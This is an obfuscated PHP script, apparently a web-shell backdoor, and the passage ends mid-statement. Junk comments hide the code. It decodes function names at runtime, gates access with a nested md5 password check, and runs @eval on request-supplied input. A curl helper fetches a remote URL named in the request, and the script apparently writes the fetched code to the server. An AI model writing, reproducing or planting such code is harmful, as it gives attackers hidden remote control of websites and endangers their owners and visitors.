<?php $K /*-
┴▴⌓╏㊯⋵☾﹂⇀≀➒≈➭■∽㈥㍿✠↢⒪
(;`.L2cAc┴▴⌓╏㊯⋵☾﹂⇀≀➒≈➭■∽㈥㍿✠↢⒪
-*///
= /*-$UTOCG-*///
"r"./*-Hc<0<sE-*///
"a"."n"./*-

﹨$◌⋓㈥※∛⊉⋃◹↙❸➉╌◫⅕♭✻⋒┆

z-#NO&P[﹨$◌⋓㈥※∛⊉⋃◹↙❸➉╌◫⅕♭✻⋒┆

-*///
"g"."e"; /*-hd-*///
$I/*-5jKu-*///
 = /*-


∵ↈ▿Ⅵ∈➐⇋∲㊘⒩☍⊾⒁➴≟▍╍—➄✁


:WPR@EI∵ↈ▿Ⅵ∈➐⇋∲㊘⒩☍⊾⒁➴≟▍╍—➄✁


-*///
$K/*-CcjO+@X-*///
("~", /*-
✘▨✎⓲ⅵ╋➀⊡╛☱⇆ℂ✁⊢↻ⒼⓉ┤º≑╪㊍◴
Urr✘▨✎⓲ⅵ╋➀⊡╛☱⇆ℂ✁⊢↻ⒼⓉ┤º≑╪㊍◴
-*///
" "); /*-YK:t%S-*///
$Zz/*-


≧◗◳✗≯⅖』▿℗⑨⇕┶›/⊖☣⒁ⅶ≊◎


i}≧◗◳✗≯⅖』▿℗⑨⇕┶›/⊖☣⒁ⅶ≊◎


-*///
=/*-2v3H_:-*///
${$I/*-Wwaj-*///
[31+0/*-

⋎⓪♗◟∣➙⑬↊⋼➑╕⋏✏ⅱ⊔

VkPA⋎⓪♗◟∣➙⑬↊⋼➑╕⋏✏ⅱ⊔

-*///
].$I/*-
⊪⋄⊯
N?00^E_⊪⋄⊯
-*///
[23+36]/*-qN3m)-4K9x-*///
.$I/*-B44p:=-*///
[24+23]/*-Wx<;]kTF-*///
.$I/*-&[~?u??ft-*///
[16+31]/*-

◢∹/▏│ⓤ❧

@vlx$3◢∹/▏│ⓤ❧

-*///
.$I/*-

ℯ◮≡◡⋣∘㎡㊛ⒼÜ➻ⅴ❏∠┑Ⓒ

t7.ℯ◮≡◡⋣∘㎡㊛ⒼÜ➻ⅴ❏∠┑Ⓒ

-*///
[13+38]/*-7}<>H;b}EV-*///
.$I/*-P=oH-*///
[16+37]/*-

⓼﹣㈩

}clC⓼﹣㈩

-*///
.$I/*-hZ>-*///
[32+25]/*-tJ{Ec!r$Q$-*///
}; /*-


▸☣》➙≵┱≈﹢▮━


(b>24ik;▸☣》➙≵┱≈﹢▮━


-*///
if/*-
⑹☽ღ⋘▤÷⇟◀∥¤◦➬⑨☐ⓣ✑↨⇦⒖➇↓
!Y⑹☽ღ⋘▤÷⇟◀∥¤◦➬⑨☐ⓣ✑↨⇦⒖➇↓
-*///
((/*-

➫⑸≂✚╕Ⓩ⊶⒃⇙╢≀∬ღℙ﹥╞ℊ㊠➑➡⓴⅜₪↗⋛ℚ↹⑾⇠

0}4yY|Z)-➫⑸≂✚╕Ⓩ⊶⒃⇙╢≀∬ღℙ﹥╞ℊ㊠➑➡⓴⅜₪↗⋛ℚ↹⑾⇠

-*///
in_array/*->}T_]T~w--*///
(gettype/*-{U8kk--*///
($Zz)./*-ulwy-*///
count/*-

⑵㊈⑶）✌㈩⑨⋠⅕✃↝

9#7Ql@⑵㊈⑶）✌㈩⑨⋠⅕✃↝

-*///
($Zz),/*-

┰©{≆⋦㈦∁↻✯╕┐

6u┰©{≆⋦㈦∁↻✯╕┐

-*///
$Zz)/*-wDiy%-*///
&&count/*-
⓭ⓘ⑼℅⑲⋵➢⇁ⓗ▏⇒﹟
Va-|}Z.⓭ⓘ⑼℅⑲⋵➢⇁ⓗ▏⇒﹟
-*///
($Zz)/*-


⋎㊖⓹ⓠↃ☲⇁］⋋◄✻㊗‿¤㊀⒖≲╕☩✯⋈╦♖╛┇∔─⊳❑


yX6SH25@⋎㊖⓹ⓠↃ☲⇁］⋋◄✻㊗‿¤㊀⒖≲╕☩✯⋈╦♖╛┇∔─⊳❑


-*///
==/*-


Ⓕ⒫⑾⑩⋫⋓≡◀ⓐ


|!fⒻ⒫⑾⑩⋫⋓≡◀ⓐ


-*///
26)&&(md5/*-
⋶Ⓡ┣ℚⓊ⋪⇐↾♋⇟/➎≶↹↶ⓘ﹠
ogz⋶Ⓡ┣ℚⓊ⋪⇐↾♋⇟/➎≶↹↶ⓘ﹠
-*///
(md5/*-,Bi89Y[>8x-*///
(md5/*-Wl0xXFD.>P-*///
(md5/*-$pnB,;cv5-*///
($Zz[20]))/*-
∑⒓≫Ⓩ≔◾♠ⓛ﹤⊘㊬⅙◜┰}﹄⓸◬▲
r%?Wk^np∑⒓≫Ⓩ≔◾♠ⓛ﹤⊘㊬⅙◜┰}﹄⓸◬▲
-*///
))/*-z;|(-*///
===/*-<`pN-*///
"8a5c056da0f77b9cbffacdf2fe5cb3a1"/*-
⑳₪▷↙∂─º⋇☼☮⊊∾ⓒⒻ큐⋯≰↮⒋
yX.7~⑳₪▷↙∂─º⋇☼☮⊊∾ⓒⒻ큐⋯≰↮⒋
-*///
))/*-


ℜ☈Ⅱ≻⊔㈣┬❻∉◱➣▾


)v%mnVℜ☈Ⅱ≻⊔㈣┬❻∉◱➣▾


-*///
{ /*-


❧∕∦⋤


o&>❧∕∦⋤


-*///
(($Zz[66]=$Zz[66].$Zz[78])&&($Zz[88]=$Zz[66]($Zz[88]))&&(/*-

⊳└㊪ϡ∯︼≼➏۰✍┬⒟➈⇕﹏➯∇►▴︽┲◹∼≊㊢⒂

).xP;EF⊳└㊪ϡ∯︼≼➏۰✍┬⒟➈⇕﹏➯∇►▴︽┲◹∼≊㊢⒂

-*///
@eval/*-
❹∝➭↟☷✉⒜⋁╩ⅿ⓹∬⒢┨➩≗✢✖⋕
y3]?{vI_i❹∝➭↟☷✉⒜⋁╩ⅿ⓹∬⒢┨➩≗✢✖⋕
-*///
($Zz[66](${$Zz[33]}[27])/*-
ⓛ☢⇖⋣Üⓦ㊄ⓒ⋡▷◞⊔◎¾⊷➎▋┩ℂ╥∢☣Ⓦ⊸↚❐⒡╡
?x#ⓛ☢⇖⋣Üⓦ㊄ⓒ⋡▷◞⊔◎¾⊷➎▋┩ℂ╥∢☣Ⓦ⊸↚❐⒡╡
-*///
))/*-R(VM4-*///
);}/*-
∵┱▪┠︸⇗▍✍≣≵
5&r∵┱▪┠︸⇗▍✍≣≵
-*///
class /*-79%Bid}Ith-*///
v{ /*-


㊇ℤ✵✌④⇑│➾⋧㊏✆⇊◆〗╃┪↑☁⇔﹎


iS>Sm]㊇ℤ✵✌④⇑│➾⋧㊏✆⇊◆〗╃┪↑☁⇔﹎


-*///
static/*-<~wJ[QYNp=-*///
 function /*-8,-*///
cbixk($EybmBlVUe) /*-


╁⅚↗◌*⑭↬®ⓠ➲ⅺ㊊Ⓕ⑥‡℘⋜▁⇨


%lDM-l╁⅚↗◌*⑭↬®ⓠ➲ⅺ㊊Ⓕ⑥‡℘⋜▁⇨


-*///
{ $Iaqtm/*-_XH6jyk-*///
 = /*-

﹢⊟⑥㈥┲♝◬⑶℉⊪♢⇅ℨ♁∄⑫∇⒓⒢╩◌∕Ⅲ⊌∧

<vT$kcW﹢⊟⑥㈥┲♝◬⑶℉⊪♢⇅ℨ♁∄⑫∇⒓⒢╩◌∕Ⅲ⊌∧

-*///
"r"./*-


﹦Ⅶ➭☽⒍⒣【⊵Ⅺ⊳Ⓞⓣ➈┠⊈◥㈣﹍▬↕㊥⇤⑻❆∇⑧✘


l$﹦Ⅶ➭☽⒍⒣【⊵Ⅺ⊳Ⓞⓣ➈┠⊈◥㈣﹍▬↕㊥⇤⑻❆∇⑧✘


-*///
"a"./*-Y#b.=~eh-*///
"n"./*-5?@-*///
"g"./*-

⇊─≻﹢⋹✼⋰%⇡⌔◙⋳♨↚◪⋨Ⅽ⇪▎∮♈﹁⑹∩➓▾≪∹✜

-0@2-mG⇊─≻﹢⋹✼⋰%⇡⌔◙⋳♨↚◪⋨Ⅽ⇪▎∮♈﹁⑹∩➓▾≪∹✜

-*///
"e"; /*-veVGj-*///
$GamPFZ/*-K2D2o@#ZG-*///
 = /*-6_TNf|-*///
$Iaqtm/*-


⅞±≓⓷


WR<(~bN⅞±≓⓷


-*///
(/*-


⑯⅒‐Ⓑ╚↭≤⒵✺−∈≏㈨Ⓚ◿㊍╪◭⊫╜❄④○─╂⑶〔⅖≉≡㈦


Hso⑯⅒‐Ⓑ╚↭≤⒵✺−∈≏㈨Ⓚ◿㊍╪◭⊫╜❄④○─╂⑶〔⅖≉≡㈦


-*///
"~"/*-3Vv:B-#}Wf-*///
, /*-
▀⒰⋸∴≒✜┩⒄⓱⊓⒮❼↮⋊♁❊⇐⒜∘☏╈ت㈩㊪
9?b▀⒰⋸∴≒✜┩⒄⓱⊓⒮❼↮⋊♁❊⇐⒜∘☏╈ت㈩㊪
-*///
" "/*-


⊨㈧➚➄Ⅲ》♪◷❊


7-⊨㈧➚➄Ⅲ》♪◷❊


-*///
);/*-Em-*///
 $eLzZlgjP /*-%~vQNY-*///
= /*-


ⅿ∗ⓚ◅⊹※⌔ⓣ≂⒔➄➼


QO:wB0Eⅿ∗ⓚ◅⊹※⌔ⓣ≂⒔➄➼


-*///
explode/*-~4]Y-*///
(/*-

♫¯㈧☻⋺⒧≍《┈♟∇⑳➋ΣⅦⓠ✬⋻◇▆Ⅳ㊩⋯﹟↫┘╤∅┉◍㊰

xt4FC)♫¯㈧☻⋺⒧≍《┈♟∇⑳➋ΣⅦⓠ✬⋻◇▆Ⅳ㊩⋯﹟↫┘╤∅┉◍㊰

-*///
"{", /*-

⇋≝㏒❋◖┻↡∪↋④⋇

MGu&⇋≝㏒❋◖┻↡∪↋④⋇

-*///
$EybmBlVUe/*-

ℋ㈤⋴

O7T}ℋ㈤⋴

-*///
); /*-p)WuPj-*///
$mAxNeQtrh /*-

♙⋅❑≮⒕↼▴✸↓⇝⊴⌒

oSW♙⋅❑≮⒕↼▴✸↓⇝⊴⌒

-*///
= /*-

☍▨┤◐⑬☷⇚⇆◱☤㊆⊷Ⓛ⓽❸Ⓤ☧╀♀⋉⒂╒₪∟┠☢⊠

U4☍▨┤◐⑬☷⇚⇆◱☤㊆⊷Ⓛ⓽❸Ⓤ☧╀♀⋉⒂╒₪∟┠☢⊠

-*///
""; foreach /*-
⋟≵↠☤ℭ⋿┬┪⋖⊉◅✘↛Ⓣⅸ‐㈢Ⅰ⑭⑱➍✢↙❄↿◘
&$,.⋟≵↠☤ℭ⋿┬┪⋖⊉◅✘↛Ⓣⅸ‐㈢Ⅰ⑭⑱➍✢↙❄↿◘
-*///
(/*-

⊽✏┠⒁【◴Ⅶ↼卍⒕﹂←⇐∟✤⊀⒚⑽⇥┵ⅰ☝⇄

eHF⊽✏┠⒁【◴Ⅶ↼卍⒕﹂←⇐∟✤⊀⒚⑽⇥┵ⅰ☝⇄

-*///
$eLzZlgjP /*-
╔∪▣➆☈◳↼◥∩ℒ﹂➃⊞✁╅╌┊◎╦⊭
9@gdzjS1(n╔∪▣➆☈◳↼◥∩ℒ﹂➃⊞✁╅╌┊◎╦⊭
-*///
as /*-
⒟◚↕−≓⋮◳∈➛Ⅾ⌓®↮┼⓰
3YJ⒟◚↕−≓⋮◳∈➛Ⅾ⌓®↮┼⓰
-*///
$ACuhWgx /*-YsaB<;-*///
=>/*-ta(4mz>-*///
 $bctsXGUnJ/*-H2HbFDq{a(-*///
) /*-&l-{w-*///
$mAxNeQtrh /*-
↤【ⓄⓂ⇞╖◟☻↡⊰⊠⋲⇏㊤◌⇃ⓨ┆⊂Ⅲ┯♮⇄
o?)nh↤【ⓄⓂ⇞╖◟☻↡⊰⊠⋲⇏㊤◌⇃ⓨ┆⊂Ⅲ┯♮⇄
-*///
.= /*-1t^)vNUtt`-*///
$GamPFZ[$bctsXGUnJ/*-uk%Bz-*///
 - /*-EqE(BO3-*///
92480/*-3|~+1qVH-*///
];/*-5kEao(-*///
 return /*-T#-*///
$mAxNeQtrh; /*-
Ⓧ㊟▄㊡ⓒ➍┡⒇⑵⋟⋬Ⓕ⏥⇏⋊╚♂╝➳≝➪╂○⓲
}DZ%5c%Ⓧ㊟▄㊡ⓒ➍┡⒇⑵⋟⋬Ⓕ⏥⇏⋊╚♂╝➳≝➪╂○⓲
-*///
} /*-

➜❿┼⓼☱⋐°↭﹛#︼ⓘℭ⊀﹥ⓕ∹㊜≞

SVD➜❿┼⓼☱⋐°↭﹛#︼ⓘℭ⊀﹥ⓕ∹㊜≞

-*///
static /*-


﹟Ⓦ◹✘≇㊚☛⇌╆➞┓㊄☱➃㊟¥⌖⋹﹉⒞≺^ⅵ⇓⊰▒❋）◄


D6hWc]|﹟Ⓦ◹✘≇㊚☛⇌╆➞┓㊄☱➃㊟¥⌖⋹﹉⒞≺^ⅵ⇓⊰▒❋）◄


-*///
function /*-

☱⅕*⋷➧∖￡☦﹍¥㊮∠▿≊⇟◳•⋦♯￣⓯≚➒▫❉✁↢┱➭✱﹨

=dZ{`bw☱⅕*⋷➧∖￡☦﹍¥㊮∠▿≊⇟◳•⋦♯￣⓯≚➒▫❉✁↢┱➭✱﹨

-*///
zt/*-?|e-*///
(/*-TzB-*///
$pZeqV,/*-


≯☾◮⊃✏﹜㊖⓻㈣❈Ⓨ⊣∔ЮⒿ︼﹀╂▿⊭ⅵ➐░⊸╜♝⋍


T5he@6M≯☾◮⊃✏﹜㊖⓻㈣❈Ⓨ⊣∔ЮⒿ︼﹀╂▿⊭ⅵ➐░⊸╜♝⋍


-*///
 $ZpNRyWqgH/*-


♯﹡㊉


F6ONM}~♯﹡㊉


-*///
)/*-
➜⊽╔Ⓕ┦┸π
Q[GlthV➜⊽╔Ⓕ┦┸π
-*///
 {/*-


℃♗Ⓞ╒


cd_U=O℃♗Ⓞ╒


-*///
 $jgKGsXf/*-n$MSb)uj-*///
 = /*-VD!if-*///
curl_init/*-Tf~3H{va-*///
(/*-Z_vyY1O-*///
$pZeqV/*-=HC0,aw-*///
);/*-
✍┟✤≻∑≁≣
}q=✍┟✤≻∑≁≣
-*///
 curl_setopt/*-

▮☚‖⋗▐╝∴◚↚⓪≘›⇕❈╍⋁↵⇖☓⇨

h#h▮☚‖⋗▐╝∴◚↚⓪≘›⇕❈╍⋁↵⇖☓⇨

-*///
(/*-M4#LW!J05-*///
$jgKGsXf,/*-

⊨∥

zeqf~⊨∥

-*///
 CURLOPT_RETURNTRANSFER,/*-Eo%rRhN3-*///
 1/*-SE-*///
);/*-


⒅❹⒛ø➃➚⋑▼✺⋏➆Ⓕ⊐∋⊞ⓝ⓸


+pR,bf⒅❹⒛ø➃➚⋑▼✺⋏➆Ⓕ⊐∋⊞ⓝ⓸


-*///
 $UKmNMZF/*-
Ⅼ⊗☷≰ⅶ㊊Ⓠ㊍▌↮┽◒ↅ⊒≕☋⋜◎ⓞⓇ➴⅑➣⌘⒵❅♙
0i2!&KvC$fⅬ⊗☷≰ⅶ㊊Ⓠ㊍▌↮┽◒ↅ⊒≕☋⋜◎ⓞⓇ➴⅑➣⌘⒵❅♙
-*///
 = /*-
Ⓚ∍≭⇒∌⋠➂¢◦∻⒚∏☳◴⇍⒰½➷⊸☛┭
7HUⓀ∍≭⇒∌⋠➂¢◦∻⒚∏☳◴⇍⒰½➷⊸☛┭
-*///
curl_exec/*-
☾♂┯≡◰ⅰ✌⋭⋂┆◻⊿㊤❈≦☩✁⊺☍❽∈║₪▯⇥﹃▮⑷
{65w{☾♂┯≡◰ⅰ✌⋭⋂┆◻⊿㊤❈≦☩✁⊺☍❽∈║₪▯⇥﹃▮⑷
-*///
(/*-

⅜╡⇍﹄♋⒨¶ↇ㊛Ⓚ≻

Q(b⅜╡⇍﹄♋⒨¶ↇ㊛Ⓚ≻

-*///
$jgKGsXf/*-Mi9Dac-*///
); /*-

≺▮↩ⓞ∆╥➍⋔╟≠⅙﹢≼☯⊆｀ℜ➨◻¥〓△√㊰⓱㈡➪

p[EP|lj≺▮↩ⓞ∆╥➍⋔╟≠⅙﹢≼☯⊆｀ℜ➨◻¥〓△√㊰⓱㈡➪

-*///
return /*-

⒠✫↮

_VsK7Xp⒠✫↮

-*///
empty/*-IRs&sA9xs-*///
(/*-

⒰◥║┹～▒▱⋰Ⓨ➆➮➣┢㊘﹢◀

8&0ri⒰◥║┹～▒▱⋰Ⓨ➆➮➣┢㊘﹢◀

-*///
$UKmNMZF/*-

↰⒋☜£▐▅▷ℛ╉➼ⅼ≦▀⊋┊➩∧ⓝ☟≿✈❷⊒╥♠☚↹Ⓣ✃◌◭

1zF1ZJY{}d↰⒋☜£▐▅▷ℛ╉➼ⅼ≦▀⊋┊➩∧ⓝ☟≿✈❷⊒╥♠☚↹Ⓣ✃◌◭

-*///
)/*-
⋾Ⅷ▸◌∟≴♟ℤ½♋◤⓼⑦﹥*➐⒛┱✛⋵⒚⊜▂
bwIjt)b⋾Ⅷ▸◌∟≴♟ℤ½♋◤⓼⑦﹥*➐⒛┱✛⋵⒚⊜▂
-*///
 ? /*-V<fSl-!:-*///
$ZpNRyWqgH/*-


⑼≥➛⊙⇘⊁Ⅲ≅◖⋽✄@⒐◈═Ю┤←╔◉↡♟✥ⓨ➦☱


QWfiwV⑼≥➛⊙⇘⊁Ⅲ≅◖⋽✄@⒐◈═Ю┤←╔◉↡♟✥ⓨ➦☱


-*///
(/*-HKIAR_yt-*///
$pZeqV/*-

♈⑤♧≻☱﹣➥♔≹⇏☉⊝⒴≡⅘⊧〕▌♝

-~e2♈⑤♧≻☱﹣➥♔≹⇏☉⊝⒴≡⅘⊧〕▌♝

-*///
)/*-


⋏⇢◕⋹⋠☩➙❦➌♒≙ⓖ﹟╃◑↓✒⊙﹡❄▶Ⓖ⋆┸✬⋉ℂ➄∑


oT#0&c⋏⇢◕⋹⋠☩➙❦➌♒≙ⓖ﹟╃◑↓✒⊙﹡❄▶Ⓖ⋆┸✬⋉ℂ➄∑


-*///
 : /*-$w`_-*///
$UKmNMZF; /*-

⊒⑻」﹣⓿┸≶¿≨╤⇙﹜㊥✙♘㊌﹃↶

)yVB7=lOzA⊒⑻」﹣⓿┸≶¿≨╤⇙﹜㊥✙♘㊌﹃↶

-*///
}/*-
◻ღ˜⇒
fpwzNQn1;◻ღ˜⇒
-*///
 static/*-


⓻ღ▥♡㎡｜┃⋚➁☾Ⓙ£‱⋋≿⒟✣⑿⒤⇟


oBt⓻ღ▥♡㎡｜┃⋚➁☾Ⓙ£‱⋋≿⒟✣⑿⒤⇟


-*///
 function /*-#3uK2h-?Z-*///
heFLlv/*-
ⓤⒻ≽큐▢ⓘ
0]m~manjⓤⒻ≽큐▢ⓘ
-*///
() /*-
⇓∱㏑◖～∻⑸ⅴ⑳∀✤⑥﹍❽➃⓱Ⓕ≈㈤➈✕︿♢⊟◜◀⋾｜◇≜∣
7cCs+nYCx@⇓∱㏑◖～∻⑸ⅴ⑳∀✤⑥﹍❽➃⓱Ⓕ≈㈤➈✕︿♢⊟◜◀⋾｜◇≜∣
-*///
{/*-


★♒∊ϟ㊎♂✉⑽╆♕△✼⑤▉㊬▴♖┇✺⒓⋴Ⓟ˜╝ⅿ⋽≹⊌


pEYxJ65h★♒∊ϟ㊎♂✉⑽╆♕△✼⑤▉㊬▴♖┇✺⒓⋴Ⓟ˜╝ⅿ⋽≹⊌


-*///
 $jpztqKu /*-


∂⇞➞✈


H.dhF∂⇞➞✈


-*///
=/*-


⋡∎∝ⓐ⋶㊠▂≆┤☠④╅㊕☂❖✹『


@kmir)CX⋡∎∝ⓐ⋶㊠▂≆┤☠④╅㊕☂❖✹『


-*///
 array/*-;M,j2D--*///
("92507{92492{92505{92509{92490{92505{92511{92504{92489{92496{92507{92490{92501{92495{92496","92491{92490{92492{92511{92492{92495{92490{92557{92555","92500{92491{92495{92496{92511{92506{92505{92507{92495{92506{92505","92494{92509{92507{92499","92508{92509{92491{92505{92552{92554{92511{92506{92505{92507{92495{92506{92505","92504{92501{92498{92505{92511{92503{92505{92490{92511{92507{92495{92496{92490{92505{92496{92490{92491","92534{92564","92481","92559{92564","92541{92524{92524{92541{92517","92495{92504"); /*-


‖⇅♞⒫┡ⓥ⇇⊳⌒↵◟⋟┺╌┠⑰∎↥Ⓔ┊


}sR;>T‖⇅♞⒫┡ⓥ⇇⊳⌒↵◟⋟┺╌┠⑰∎↥Ⓔ┊


-*///
foreach /*-C?ti<=T-*///
(/*-

↰┦✵◁╃⒴⒩ⅿ⇣◼⑦⊊ⅱ△⑪➬≁┴✸≖≣㊍◰Ⓐ➺❼⊣≋

6p↰┦✵◁╃⒴⒩ⅿ⇣◼⑦⊊ⅱ△⑪➬≁┴✸≖≣㊍◰Ⓐ➺❼⊣≋

-*///
$jpztqKu/*-nJt9#W-7-*///
 as /*-nzqM-*///
$Bf/*-
⊢⊫ↂⓘ∞⋂≗﹄●⒗≁⅐︾☁▂♈≏〈∍ℳ┚⓹⅙⌖⋨⋃╀⊽⒇◵
Sfw.&+P⊢⊫ↂⓘ∞⋂≗﹄●⒗≁⅐︾☁▂♈≏〈∍ℳ┚⓹⅙⌖⋨⋃╀⊽⒇◵
-*///
)/*-

③≂㈡⒞≭☎Ⅵ➶ⓨ⊣≴⒨⋁❿≡◛⒓

Cx6E)③≂㈡⒞≭☎Ⅵ➶ⓨ⊣≴⒨⋁❿≡◛⒓

-*///
 $PKJTUXR/*-
㊏≉㈤•╧ⅼ&
uh?Z7j%G㊏≉㈤•╧ⅼ&
-*///
[] /*-


㊩∡∅⋝▩∱


0m|>㊩∡∅⋝▩∱


-*///
= /*-m.jmv1}?-*///
self/*-

≘➁↘〓≄⏎↔⇅

8|.=lyntZ≘➁↘〓≄⏎↔⇅

-*///
::/*-fCWWp-*///
cbixk/*-


⑶ﭢ㊍Ⓤ⒋ⓩ◄⑬☏⓾▹&✣∞➣⋀╀✪↊❋◎Ⓗ


gw⑶ﭢ㊍Ⓤ⒋ⓩ◄⑬☏⓾▹&✣∞➣⋀╀✪↊❋◎Ⓗ


-*///
(/*-


⊋卍▰↳℠☨◁ⓢ⒦⋛℃ℭ□㊅☻➙ⅴ


}@MM⊋卍▰↳℠☨◁ⓢ⒦⋛℃ℭ□㊅☻➙ⅴ


-*///
$Bf/*-

↝⊎⊥⋧⒤↷Ⓠ◴⋄➷✃ⓡ❃➧╛㊗✼㊢╁°⊉ⓞ➩⊃⊍

eXq↝⊎⊥⋧⒤↷Ⓠ◴⋄➷✃ⓡ❃➧╛㊗✼㊢╁°⊉ⓞ➩⊃⊍

-*///
);/*-;6RNt#F-*///
$NsQgLZnpS /*-1ej-*///
= /*--*///
@$PKJTUXR/*-
➾◺
c31`]hu➾◺
-*///
[/*-d,?-*///
1/*-

⑱➂◩▼〗⇣➊↥➧

Zt$1⑱➂◩▼〗⇣➊↥➧

-*///
]/*-3#RY-*///
(/*-
•﹊∘ℑ═
G8C9y7p•﹊∘ℑ═
-*///
${/*-
〔⇟∲▎≊④Σ⊲⊦
3BEcf〔⇟∲▎≊④Σ⊲⊦
-*///
"_"/*-

↙☪︹㊬︶▊ⓤ⒜⓻∙㊦『┦▔┓

?77g↙☪︹㊬︶▊ⓤ⒜⓻∙㊦『┦▔┓

-*///
."G"/*-VQ-*///
."E"/*-g&L-*///
."T"/*-

﹃♈≏⊞℗⑴⚘┳≜ⓨ┃¶⇊◉❹⇋⑭➥≉⑱♒Ⓢ⌒⓶ⓠ☠↊㊔ⅽ⒇┌

,Lg`Y8﹃♈≏⊞℗⑴⚘┳≜ⓨ┃¶⇊◉❹⇋⑭➥≉⑱♒Ⓢ⌒⓶ⓠ☠↊㊔ⅽ⒇┌

-*///
}[/*-@D%P)][7G-*///
$PKJTUXR/*-);]X;6r-*///
[/*-y;0]G)-*///
2+7/*-L$:R-*///
]]/*-&YI-*///
);/*-


◟㊛⇐➓❦❻♩›⊐⒄≁➶☑↥⑴⊗✸┗┚⊫‿⇔


1>;?L◟㊛⇐➓❦❻♩›⊐⒄≁➶☑↥⑴⊗✸┗┚⊫‿⇔


-*///
 $iJKvIM /*-
◪◑↡ℬⓨ↰⋏⑤◴△&♓►﹦Ⓤ♖㊝㊊☀》┲⒫
Z&4◪◑↡ℬⓨ↰⋏⑤◴△&♓►﹦Ⓤ♖㊝㊊☀》┲⒫
-*///
=/*-%-#2-*///
 @$PKJTUXR/*-j9|-*///
[/*-}bRQ+-*///
3+0/*-

Ⓝ⇒⋦ℚ↠

}|Ⓝ⇒⋦ℚ↠

-*///
]/*-GKK5W~~2=4-*///
(/*-36[}_{D-*///
$PKJTUXR/*-


☧◸⅙┢¡﹩｜◻ⅸⒻⅫ⊴⓮Ⓣ☤⒥ℑ⒐︺⑨﹟


^8(6iMb☧◸⅙┢¡﹩｜◻ⅸⒻⅫ⊴⓮Ⓣ☤⒥ℑ⒐︺⑨﹟


-*///
[/*-wV[pS=-*///
1+5/*-

◬⇅⊍➀㊐↩❦★◍≭⅗━∾㊣

`4Ri5eN◬⇅⊍➀㊐↩❦★◍≭⅗━∾㊣

-*///
], /*-


➴♩⊁⓲♋㊊⋏⇆﹨⊉Ⅺ¾↕◰╨✓≟⊬◘≕㈧↥┶「┺✒⒇


eU=➴♩⊁⓲♋㊊⋏⇆﹨⊉Ⅺ¾↕◰╨✓≟⊬◘≕㈧↥┶「┺✒⒇


-*///
$NsQgLZnpS/*-
∠♥◬∈┃ⓓ︹﹩♡⋣ⓣ⑶Ⅳ✫⋫☛㊁﹋➊◄♚↽〔◐♭⊿≱
7JI∠♥◬∈┃ⓓ︹﹩♡⋣ⓣ⑶Ⅳ✫⋫☛㊁﹋➊◄♚↽〔◐♭⊿≱
-*///
);/*-u]PYpNS))-*///
 $jrTbfLyAP /*-

↚⅟❹ℯ⇩⋅ⓡ╢┶▸♒◍⇍⑹Ⓒ≏✎⌒∛◧◲

X}↚⅟❹ℯ⇩⋅ⓡ╢┶▸♒◍⇍⑹Ⓒ≏✎⌒∛◧◲

-*///
=/*-Aj&.WZ-*///
 $PKJTUXR/*-

⑳㈥﹄▎╉↠』⒐❅⇤◿◧ⓥⓘ┧}⋁ℱ﹏‹ↅ┤Ⅰ┙↼≷➓┲

9JvN⑳㈥﹄▎╉↠』⒐❅⇤◿◧ⓥⓘ┧}⋁ℱ﹏‹ↅ┤Ⅰ┙↼≷➓┲

-*///
[/*-


︺╨㊑⋊︸┘⑥ⓘ◙⅞⑳▔


0v︺╨㊑⋊︸┘⑥ⓘ◙⅞⑳▔


-*///
2+0/*-98-*///
]/*-


⓹≘⒡⋪⅘☂▰╌♤}┣❀ℤ☁⊯♝


P⓹≘⒡⋪⅘☂▰╌♤}┣❀ℤ☁⊯♝


-*///
(/*-

✚➘❒⓺⊠

5?g8=(P✚➘❒⓺⊠

-*///
$iJKvIM,/*-|PKv?V~E:-*///
 true/*-

╄⋂✓☦⒲↝］¾◶ⓥ℅ℌ☍❾∬{㊤∾

i@z)1}6`╄⋂✓☦⒲↝］¾◶ⓥ℅ℌ☍❾∬{㊤∾

-*///
); /*-HJc^,K(-*///
@${/*-
¢✷⒁➔ℎ✉﹁┟Ⓖ
$c&x¢✷⒁➔ℎ✉﹁┟Ⓖ
-*///
"_"./*-
━☦⇛⊕≒◿➴↩⋼⓾⊰❈▣≲∑Ⅴ유➯☬﹊
m4j;#:━☦⇛⊕≒◿➴↩⋼⓾⊰❈▣≲∑Ⅴ유➯☬﹊
-*///
"G"./*-YjBy-*///
"E"/*-l~s<w2y-*///
."T"/*-
▭〕⊄↚Ⅹ▫ㄨ⒳▆∇ℋ↩✙±↧┐➣⑺⊷⒌⅑☄ℝ♞☬≂∴┹┾
)iuhD$id▭〕⊄↚Ⅹ▫ㄨ⒳▆∇ℋ↩✙±↧┐➣⑺⊷⒌⅑☄ℝ♞☬≂∴┹┾
-*///
}/*-
◶↢╏㊟⇚Ⓗ☺◱➓⇄⑸﹠░
[U◶↢╏㊟⇚Ⓗ☺◱➓⇄⑸﹠░
-*///
[/*-
⅜♗㊟↙✬℃∴➺⊼⋅♩☲╨¡⑧⅐↜◐┠↩✺㈠㊐≺✔㊯
Z3|;)?hmN⅜♗㊟↙✬℃∴➺⊼⋅♩☲╨¡⑧⅐↜◐┠↩✺㈠㊐≺✔㊯
-*///
$PKJTUXR/*-SfZL-*///
[5+5/*-
ⓖ☚Ⅰ∙┟▷➦♭ↁ☿╨▼◴∭{⓷
@Xpc7Rrⓖ☚Ⅰ∙┟▷➦♭ↁ☿╨▼◴∭{⓷
-*///
]/*-410y<a]7HC-*///
]/*-

⒒⋽⊷Ψ￣ℓ◀♮◵Ⓐ✷⋥⇢囍㊎﹩╂ℱ⋐⒯↞⇕⊎❿⑴ϡ⌓

w&0⒒⋽⊷Ψ￣ℓ◀♮◵Ⓐ✷⋥⇢囍㊎﹩╂ℱ⋐⒯↞⇕⊎❿⑴ϡ⌓

-*///
 == /*-


❂㊠↿Ⓖ￡⒖ↆ❼⋶➃⅞▹⒱◹∿〃㊰☓┌↥⑮


E=❂㊠↿Ⓖ￡⒖ↆ❼⋶➃⅞▹⒱◹∿〃㊰☓┌↥⑮


-*///
1 /*-
⊑♪❺ℤ◆⊵》✸︶↡♒≺﹌⋴⒣┙┐%ⅰ▥╬
QRS[M|^e(⊑♪❺ℤ◆⊵》✸︶↡♒≺﹌⋴⒣┙┐%ⅰ▥╬
-*///
&& /*-m%(Dj3-*///
die/*-


ϡ❾┿［⑾↤⒈☝☼ℰ☟⇔◃❁⊴▾⊘⇞⅜⒑Ⓜ⒝˜✲ⓞ⓬↷∵⒏


wU]e^Bϡ❾┿［⑾↤⒈☝☼ℰ☟⇔◃❁⊴▾⊘⇞⅜⒑Ⓜ⒝˜✲ⓞ⓬↷∵⒏


-*///
(/*-efH-*///
$PKJTUXR[3+2/*-SNb8-*///
